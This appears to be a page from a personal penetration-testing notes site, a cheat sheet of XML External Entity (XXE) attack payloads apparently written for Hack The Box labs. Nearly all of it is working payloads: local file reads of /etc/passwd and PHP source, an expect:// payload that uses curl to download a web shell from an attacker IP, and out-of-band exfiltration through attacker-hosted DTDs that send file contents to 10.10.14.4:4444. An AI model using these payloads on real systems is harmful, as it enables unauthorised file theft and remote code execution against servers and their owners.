📖
sheepwall
  • Overview
  • Cloud Hacking
    • Azure
  • Hacking
    • Recon
      • Nmap
      • Website Recon
      • Service Enumeration
    • Exploitation
      • GraphQL
      • Application Attacks
      • Web Server Attacks
      • JSON attacks
      • CMS attacks
      • SQL Injection
      • Cross Site Scripting
      • Command Injection
      • SSRF
      • SSTI
      • Server Includes
      • XXE
      • WSDL/SOAP
      • Serialization Attacks
      • Cryptography
      • JWT
    • Installation
      • File Uploads
      • File Transfers
    • Actions on Objectives
      • Networking
      • Linux
    • Tools
    • Windows
      • 1. Getting Foothold
      • 2. Windows Exploitation
      • 3. Enumerating Active Directory
      • 4. Dumping Credentials
      • 5. Lateral Movement
      • 6. Persistence
      • 7. Active Directory
      • 8. LAPS
  • Bug Bounties
    • SSRF to Envoy Admin Page
    • Leaky Error Messages
    • HTTP verb tampering results in administrator role to the application
  • APT Information
    • DFIR Summary
Powered by GitBook
On this page
  • LFI
  • LFI Encoded
  • RCE
  • CDATA Exfiltration
  • Error Based XXE
  1. Hacking
  2. Exploitation

XXE

LFI

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///etc/passwd">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

LFI Encoded

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

RCE

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

CDATA Exfiltration

enyei@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
enyei@htb[/htb]$ python3 -m http.server 8000

Serving HTTP on 0.0.0.0 port 8000 (<http://0.0.0.0:8000/>) ...

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
  <!ENTITY % end "]]>">
  <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
<root>
<name></name>
<tel></tel>
<email>&joined;</email>
<message></message>
</root>

Error Based XXE

  • Host this external dtd on our server

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php">
<!ENTITY % oob "<!ENTITY &#x25; content SYSTEM 'http://10.10.14.4:4444/?content=%file;'>">
%oob;
%content;
<?xml version="1.0"?>
<!DOCTYPE email [<!ENTITY % remote SYSTEM "http://10.10.14.4:4444/xxe.dtd"> %remote;]>
<root>
<name></name>
<tel></tel>
<email>&content;</email>
<message></message>
</root>
PreviousServer IncludesNextWSDL/SOAP

Last updated 2 years ago